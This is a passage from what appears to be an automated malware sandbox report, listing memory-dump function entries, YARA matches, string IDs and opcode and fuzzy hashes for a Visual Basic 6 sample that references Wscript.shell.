          • #716.MSVBVM60(?,Wscript.shell,00000000), ref: 0041963E
          • __vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000), ref: 00419647
          • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419651
          • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419659
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp
          Similarity
          • API ID: __vba$CheckHresult$#716AddrefChkstkFree_adj_fdiv_m64
          • String ID: 4:4:4$Wscript.shell
          • API String ID: 2947573536-1552047234
          • Opcode ID: bc042b7ddf8af64c9a9027cd6b8b1eb764a75a9a52435bed8d2e93602713fd8c
          • Instruction ID: d94fa39a83c2d33935936f5108d2888f1a34c5f25890802ccd02aa14efad02d3
          • Opcode Fuzzy Hash: bc042b7ddf8af64c9a9027cd6b8b1eb764a75a9a52435bed8d2e93602713fd8c
          • Instruction Fuzzy Hash: CB511B71940208EFDB01EFA5C985BDEBBB4EF08754F10802AF515BA2A1C7789995CB98
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp
          Similarity
          • API ID: #100
          • String ID: VB5!6%*
          • API String ID: 1341478452-4246263594
          • Opcode ID: c0d278eafa4630f7df8894d0daa8e5ad54c9ef4591ed038ee09ab6c7f89b0c90
          • Instruction ID: ddb5f96d036d07a5314e3535ad705eb00fad920c207ff555a6e46bc4e848991e
          • Opcode Fuzzy Hash: c0d278eafa4630f7df8894d0daa8e5ad54c9ef4591ed038ee09ab6c7f89b0c90
          • Instruction Fuzzy Hash: 7EE0096150E3C19EE30323B459255A57F755E5721571A04E7D4C0DB8E3C52A0809C366
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$,l(t$H"8H$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2867974647
          • Opcode ID: 1f1e1f30281949fc290ebbb5db6aeb1dad851d8c6b81ca8bae91cf392c12ec02
          • Instruction ID: 45a3a7d0b6c50f997bc5ce492a420e9e87424b64499e921e25c3fc6fff03dbb6
          • Opcode Fuzzy Hash: 1f1e1f30281949fc290ebbb5db6aeb1dad851d8c6b81ca8bae91cf392c12ec02
          • Instruction Fuzzy Hash: 5F9233716043858FDB358F38CC997DA7BB2BF56310F56822EDC898B252D3748A85CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: %$+m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2973790934
          • Opcode ID: a109af086601a619204bfc5259aa3af70058cea5309fd285b2488f19936f3ace
          • Instruction ID: 3fe168b5afba7b6840e9f41223f764aa16ff1f1448fd15608efcc38e936d44c2
          • Opcode Fuzzy Hash: a109af086601a619204bfc5259aa3af70058cea5309fd285b2488f19936f3ace
          • Instruction Fuzzy Hash: F792FD716043899FCB749F29CC85BEABBB2FF55300F55812EDC899B211C7349A85CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 79d625984f19cdb3dbc04c3bc658e3d393e85c2216dc7c389afc5f10005fbed9
          • Instruction ID: b170093ea1a527e1a3a7ccd3fc79d122a66bac88689814a71991d19ad575705e
          • Opcode Fuzzy Hash: 79d625984f19cdb3dbc04c3bc658e3d393e85c2216dc7c389afc5f10005fbed9
          • Instruction Fuzzy Hash: E7521E716043899FDB749F38C9957DABBB2FF55300F52812EDC899B211C3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: c4d5a118df847bfb210b5ab3eab61d522d28255c045448d14c532ce3e202501b
          • Instruction ID: f20b90c0305b789ab7ccc98445de4c70acf2f19891ec5b3d52626c75b6661e28
          • Opcode Fuzzy Hash: c4d5a118df847bfb210b5ab3eab61d522d28255c045448d14c532ce3e202501b
          • Instruction Fuzzy Hash: 14520E716003899FDB749F38C8957DABBB2FF55300F52812EDC899B211D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 9d688bfd9394a02ba7e8d9acc8b43fbdbacf0fa621fcc686b23af1e5b7b93091
          • Instruction ID: a062600aa30fee1d78b59f0b767417013670ceee9a2fc60401fde3e5b242ca9d
          • Opcode Fuzzy Hash: 9d688bfd9394a02ba7e8d9acc8b43fbdbacf0fa621fcc686b23af1e5b7b93091
          • Instruction Fuzzy Hash: 05420D726003899FDB748F28CD957DABBB2FF55300F56412EDC899B211D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: de95159b79fd4fb19e37c4efd9fd6a8726bd33e76e5bf179757c2423e406bd47
          • Instruction ID: 9f73817128c7ec777719e4625258930c2f6350fa41302c8f80a1ffdcf3e8d612
          • Opcode Fuzzy Hash: de95159b79fd4fb19e37c4efd9fd6a8726bd33e76e5bf179757c2423e406bd47
          • Instruction Fuzzy Hash: 37322F716003899FDB748F28CD957EA7BB2FF55300F92412EDC899B211C3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 31fc3bb3474ced562870bcfd830f2c13af40e3f021f692081d7bccc89d484163
          • Instruction ID: 140dbf0c339a6ea017a3c0b69a01e87b21f85fe3a7caa6ab5b20ecaf665bac09
          • Opcode Fuzzy Hash: 31fc3bb3474ced562870bcfd830f2c13af40e3f021f692081d7bccc89d484163
          • Instruction Fuzzy Hash: 52323F726003899FDB748F28CD957DA7BB2FF55300F56412EDC899B221D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Instruction Fuzzy Hash: BB31AD752011848FDB65DE6AC894ACF77A2BB99311F21D226C90D8F326C2319D468BC1
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: )H)m
          • API String ID: 0-4122108382
          • Opcode ID: 2971ddbe969c844fc55504fe08edc8c19b040db7b94f9dd209a2a65610b8cabf
          • Instruction ID: fbaccadcaff4a6cc21a95afde91059d3991b99831c9b8a2ad1c54637eed027e0
          • Opcode Fuzzy Hash: 2971ddbe969c844fc55504fe08edc8c19b040db7b94f9dd209a2a65610b8cabf
          • Instruction Fuzzy Hash: 1F315B36A402C44FDB258E3C88557DF7B916B16345F259277CC19CF302E125CD0997C6
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ,l(t
          • API String ID: 0-2153309777
          • Opcode ID: 4646e727f52cca23a2b05804d0c7e33a40f89ccc956f91c20452a31fb23416ac
          • Instruction ID: d292446609146f50a4da152b0853409aeec30a0619bb3043e5fde8a36098ad1f
          • Opcode Fuzzy Hash: 4646e727f52cca23a2b05804d0c7e33a40f89ccc956f91c20452a31fb23416ac
          • Instruction Fuzzy Hash: 483127355012804FCB699F78DC913DF7B95BB66384F26D22ACC099F346E3314E898792
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: t
          • API String ID: 0-2238339752
          • Opcode ID: d41e132ec143b0b15a82a1b6e5eafa75b1814d4efe18cf46728dbb7bc201efeb
          • Instruction ID: 3fd0f92c753336de35f7247534b548fc8355a12e1d2979d6a34461f21f9ab26a
          • Opcode Fuzzy Hash: d41e132ec143b0b15a82a1b6e5eafa75b1814d4efe18cf46728dbb7bc201efeb
          • Instruction Fuzzy Hash: A611512A7521D64ED7711F7888592DE2B15AB1B358F5DA211CC584F393E3250A4DC386
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b0a398e455cd125f4b70a6101262b1db49e329a3df17aaed644b8698f30413d3
          • Instruction ID: 049f644f6bed6b0be18e7f2c325a94ca26f533f2d1c74c9fb860ef0735a2bbdb
          • Opcode Fuzzy Hash: b0a398e455cd125f4b70a6101262b1db49e329a3df17aaed644b8698f30413d3
          • Instruction Fuzzy Hash: 15911171604389DFDB74DE28D9907EA77A2AF08340F55002FDC4D9B242D7345E89CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ee3aa22a4033a59b5af820528fb37decdf31333e0462ad23557a4445d0c82995
          • Instruction ID: 7287e766d66c0083073b07bb99f077e1b357061135912cbf9bcd8d8a7717347d
          • Opcode Fuzzy Hash: ee3aa22a4033a59b5af820528fb37decdf31333e0462ad23557a4445d0c82995
          • Instruction Fuzzy Hash: 50810171A082899FDB70CE29CC947DB77F2AF68341F85802A9C8DDB311D7348B458B56
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f8323f5934bd858012dbc5bf921888b52a53d8c7d34098d5ada8f02ba3238076
          • Instruction ID: 59d3749d902057f6240fd45875b875a6a38ff01712b1f103ba7baaad59093085
          • Opcode Fuzzy Hash: f8323f5934bd858012dbc5bf921888b52a53d8c7d34098d5ada8f02ba3238076
          • Instruction Fuzzy Hash: A591CFB1608385DFCB68AF75C8857EEBBB2FF05300F51851EED8996262D3345585CB06
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 488ddd8a4ddfba3736c862e8a85adf5738e20c7122bdd2296f153fce67decd2d
          • Instruction ID: 3efb6f632dbf1b0ee0842e76cd4ada1f054a9c36eefbab4760df4b0edb2522a1
          • Opcode Fuzzy Hash: 488ddd8a4ddfba3736c862e8a85adf5738e20c7122bdd2296f153fce67decd2d
          • Instruction Fuzzy Hash: 6F711F756082859FDB74CF29C8957DF7BE6AFA8340F54802ADC8C8B311D3308E468B56
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fedc68ca3f45fc8c9c449e918b3fd18bf0310b3b4f773a793e5826e4ec4b5286
          • Instruction ID: d2b3743873ca0c97c81bdf6b883819fd6fa3bb80962dc8d809ca2030d8f26bec
          • Opcode Fuzzy Hash: fedc68ca3f45fc8c9c449e918b3fd18bf0310b3b4f773a793e5826e4ec4b5286
          • Instruction Fuzzy Hash: 4361E236A002568FDB349F28CC517EE77A5FF89354F16422AEC98DB352D3309D898B85
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ddb7bc03a16bf78a829c879100d3f296d7ffadd5226888af80bcbe1f7a87c284
          • Instruction ID: 39b782e662a415fea65c42ec7ff7d420aad19024ffac8e7bff92e56150c9afc0
          • Opcode Fuzzy Hash: ddb7bc03a16bf78a829c879100d3f296d7ffadd5226888af80bcbe1f7a87c284
          • Instruction Fuzzy Hash: 487100B16042899FDB74CE29CC957DB77F2AFA8341F44802E9C8DDB211D7308B458B56
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 389ac4642bad58a9cc68b93021bf073a9db0b791e29970a5290751786860bc03
          • Instruction ID: 8fa1b06f1cfd7d73251791812ce3f34598c55f9e9cbea8fa95e0f43cf2fa3240
          • Opcode Fuzzy Hash: 389ac4642bad58a9cc68b93021bf073a9db0b791e29970a5290751786860bc03
          • Instruction Fuzzy Hash: D25122B16012989FCB309F28CC94BDE3BA6FF99354F55412AEC489B312D7314E85CB82
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4b4bf6f1ac2e095e7dbb6df8d1360d693fea8852d32238cfa3cddf60780f9aea
          • Instruction ID: 7768f18e6b849c3d0e7fadcf3448ae50073cf7589a35d557f7e250227eaa5633
          • Opcode Fuzzy Hash: 4b4bf6f1ac2e095e7dbb6df8d1360d693fea8852d32238cfa3cddf60780f9aea
          • Instruction Fuzzy Hash: B251E4727006469FD728CF29DC917DB77A1BF85345F25822AEC188B302D730AE598BD5
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0feb5bacfe85ff244db50e0b64609f242b423c54bfb713b7a7c3a419905c0a31
          • Instruction ID: a39afaf8b48a137773f832e643bd838e3af2a266fc718d673f8f8f9751fce683
          • Opcode Fuzzy Hash: 0feb5bacfe85ff244db50e0b64609f242b423c54bfb713b7a7c3a419905c0a31
          • Instruction Fuzzy Hash: 19510271605399DFDB788F28D9916DE7BA6BB05341F55001ADC4D9B302D3316E49CB82
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c1a99b4e203a645d70cf8562c114af37c6869bce46b7e70fb28febd4e84b79e0
          • Instruction ID: cd27709685b1260f806a4083632118e5893dac376ec55914426a22b0e7810ed8
          • Opcode Fuzzy Hash: c1a99b4e203a645d70cf8562c114af37c6869bce46b7e70fb28febd4e84b79e0
          • Instruction Fuzzy Hash: 0A510271605399DFDB788F28D8916DE7BA2BF19341F95001ADC4C9B342D331AE48CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 752f5a923d2a846a5c0c046826eb512ba466540e60c49aa0ae4e3638f1196d46
          • Instruction ID: 00dbdbf1de88f1b34475ea8c8f427a9a7f9b527432317973f6b7d61a5658d5c7
          • Opcode Fuzzy Hash: 752f5a923d2a846a5c0c046826eb512ba466540e60c49aa0ae4e3638f1196d46
          • Instruction Fuzzy Hash: 0E5110756052848FDB348F29C8957DFBBB6BFA8340F55811ADC498B311E3308F458B92
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6d8d347f2179a850c84953b565cc34353ed4773c3449d98c81bd49a6888150f2
          • Instruction ID: 8c873ba6682e3effa82a083ce4adbbbf5ce83662f0799d4849ad953bca6493ec
          • Opcode Fuzzy Hash: 6d8d347f2179a850c84953b565cc34353ed4773c3449d98c81bd49a6888150f2
          • Instruction Fuzzy Hash: 35511371605398DFDB788F28D9916DE7BA2BB08341F85001AEC4C9B302D3316E48CB96
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8d8e361f2501926e511e4030f441aeacb58827f97f34e8f4976f0828b428e7ae
          • Instruction ID: 46da9e7535195f5fbc1bd8c3a769e9f8b5ceb6282dffea2a60868e6f3bc81e04
          • Opcode Fuzzy Hash: 8d8e361f2501926e511e4030f441aeacb58827f97f34e8f4976f0828b428e7ae
          • Instruction Fuzzy Hash: E751F371605399DFDB788F28D9916DE7BA2BB09341F95001ADC4C9B302D3316E48CB96
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f77eab2b6717d13e704985ed6e1671c742d6911adf448e61033698123fd1b515
          • Instruction ID: e19753d9c45779037a76486479c85fc50be57475c778506760c49beb3a5e6c5d
          • Opcode Fuzzy Hash: f77eab2b6717d13e704985ed6e1671c742d6911adf448e61033698123fd1b515
          • Instruction Fuzzy Hash: 67412175505285CFD7249F6488563DF7BB2BF94341F59811EDC898B312E3304F858B92
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d10dd06f89b0012d410af7bc4730858a345eb26043baa2515aca25353de7c367
          • Instruction ID: 298d09cfd920cd35c44f2431bbfcd4633756ff6dda5c50ec34e09b022ca3dac5
          • Opcode Fuzzy Hash: d10dd06f89b0012d410af7bc4730858a345eb26043baa2515aca25353de7c367
          • Instruction Fuzzy Hash: 40419C329083859FCF359E3489943EBBB62AB50301F55825FCC5B4F28BC634590AC75B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d9e34922a6633698b1a801bc165a0578b5b7f6de5e131e66ec8d3ace718373c9
          • Instruction ID: 0a3f031fbd8a4f1e02460a36b8fe88b24b8623059e6bef12b06a31983181027b
          • Opcode Fuzzy Hash: d9e34922a6633698b1a801bc165a0578b5b7f6de5e131e66ec8d3ace718373c9
          • Instruction Fuzzy Hash: 8731F9352443D14BDB71CE788CA47CB7B91AB42318F19D26DCC588F397E2369946C782
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bfdfe6a589543dac3b7bcb94c3eaeb3815174ea10abb9711ec595843b222add2
          • Instruction ID: bed4486334e2335c0e0ac3b33b48a0240e7a66a06d29afb544f980de58761b8d
          • Opcode Fuzzy Hash: bfdfe6a589543dac3b7bcb94c3eaeb3815174ea10abb9711ec595843b222add2
          • Instruction Fuzzy Hash: 2E316C369083858FCF39DE3489943EAB762AB50301F95825FCC5B4F28BD6345906DB9B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d5bc71330da895fcafd171f728bc6b06e6943c61aaa9b04461e5a14f51303899
          • Instruction ID: 807dd3baab8600709a7b440030efffc965a1120a2c03b8ffe5ec1f7c825c3629
          • Opcode Fuzzy Hash: d5bc71330da895fcafd171f728bc6b06e6943c61aaa9b04461e5a14f51303899
          • Instruction Fuzzy Hash: 5C3143365043948FC7646F28C9857DF7BA2FF49309F16161DEDC85B212C3365E868B86
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3c36c2c266ce45498a0e0e432a61730bb85af2722e8c38d376701ff9daa6f90f
          • Instruction ID: 3f39328e1750e27526fb27695982908507195e733076f420b08858cb9d5dc3c0
          • Opcode Fuzzy Hash: 3c36c2c266ce45498a0e0e432a61730bb85af2722e8c38d376701ff9daa6f90f
          • Instruction Fuzzy Hash: 36315C365042904FCB395F3488552DEBB61BB16305F16926ECC6B4F387D624190A9797
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b4092d162501ff32430b514ca5afbb407766aeaa3096d8300074907658512e5e
          • Instruction ID: 38bf0d4d036afe47c3cc4ed95c56c9c51d82d1f766f0035c6f50d327cb991cb0
          • Opcode Fuzzy Hash: b4092d162501ff32430b514ca5afbb407766aeaa3096d8300074907658512e5e
          • Instruction Fuzzy Hash: 6A31DE756413818FD7689F69C8C9ADEBBA0FF19345F51822DDC588B262D7309E888F81
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 86fc441b64d0f85a8f0dedec60c9429e22755cd5e949a5d7e0a2bb9d4b48ff69
          • Instruction ID: 742f7ee1b7545e2141421d423bc457acbc37cce9133df13eb12d06207ce79a81
          • Opcode Fuzzy Hash: 86fc441b64d0f85a8f0dedec60c9429e22755cd5e949a5d7e0a2bb9d4b48ff69
          • Instruction Fuzzy Hash: 4F2149327452908FD7A89FB8CC222EF3B64BB45381F12613EDC4A9B351D7354D498782
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b6c88e857595dec156c71c490ca4f392b0be3e6bdb291cb836b2ca3b14051e90
          • Instruction ID: 527ea45a791fe421cae38125160a0077232728858ee21e3bd7aa6975a4cad34d
          • Opcode Fuzzy Hash: b6c88e857595dec156c71c490ca4f392b0be3e6bdb291cb836b2ca3b14051e90
          • Instruction Fuzzy Hash: D021F2361056D25ED3229B3C881A7DFAF556F13358F46838ECC901B786E3221A4983C2
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 644f85c25e357958f556deccba80ee41b4dfb439dac80e21ff634ef9a8f0a936
          • Instruction ID: 2d78ea5cad05c95a22cb92465ca7018b322ab5805799d059bc2b89b36ef82075
          • Opcode Fuzzy Hash: 644f85c25e357958f556deccba80ee41b4dfb439dac80e21ff634ef9a8f0a936
          • Instruction Fuzzy Hash: EC31F1711083948FDB646F29CE85BEA7BA1FF49305F46050DEEC957251C3799A82CB0B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 10fd078067cdd3085864e7b2a1873e539036dfc45c6e6840d2c49bdfea3a244c
          • Instruction ID: c4bdc2611387a0c7e4b0026a927b8c42beed8a1dbaaaa6b0b4ac6bc7a24a1ac6
          • Opcode Fuzzy Hash: 10fd078067cdd3085864e7b2a1873e539036dfc45c6e6840d2c49bdfea3a244c
          • Instruction Fuzzy Hash: D9216A315152908FD3585F3888126DFBBA6FFA6344F66A12DDC888B725E2324E85C7C3
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2c7d609218396ba62f3bc6ecbaa874b527a58d594441d14634aa6a5bef375c89
          • Instruction ID: e2e19820d1f4eeb52b5006db8f3a8130283773ddb014f98ab511fcd3fe0a5433
          • Opcode Fuzzy Hash: 2c7d609218396ba62f3bc6ecbaa874b527a58d594441d14634aa6a5bef375c89
          • Instruction Fuzzy Hash: 193195301487C58BDF72CE78CCA4BC6BB91AF41324F4982ADCC998E29BE3758546C752
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6d428ed9c7fe478cdb4627c8d3b20f15d77e1ddd5b6a83f81017e5f01344c86a
          • Instruction ID: e29e990a0a83a1f3f7ae258219e835bc505cba454421d382fc99a11bbb7ce3e9
          • Opcode Fuzzy Hash: 6d428ed9c7fe478cdb4627c8d3b20f15d77e1ddd5b6a83f81017e5f01344c86a
          • Instruction Fuzzy Hash: 6621B6351493D10BDB728EB888A47CBBF416B53268F19D2ADCC584F2D7E27645468392
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5154eac9034a6c3cc8e5de25587430c1ba6bf72ad175959f4e1139264ca15a8a
          • Instruction ID: 2e8b9e19af41ea62e42a0ab5a3d5e0c84f768a3bbb5e5f66c9708abbb1ec637f
          • Opcode Fuzzy Hash: 5154eac9034a6c3cc8e5de25587430c1ba6bf72ad175959f4e1139264ca15a8a
          • Instruction Fuzzy Hash: 31118E397152818FC3896FBCC46119F3F517B57388F26A12DD8859B7A3D4125D4A87C1
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7c93a0ab3130a38607604b1df140c54ccf854f805f26d0b8845b93af785e4b24
          • Instruction ID: 6f52a352958c2b251be2f1039ca292308776827971e3b63202b9636eecd68d49
          • Opcode Fuzzy Hash: 7c93a0ab3130a38607604b1df140c54ccf854f805f26d0b8845b93af785e4b24
          • Instruction Fuzzy Hash: B2119E31648344DBDBA8AE788D667FA37B1AF45341F01152EDD8B972A0CB3846498B06
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
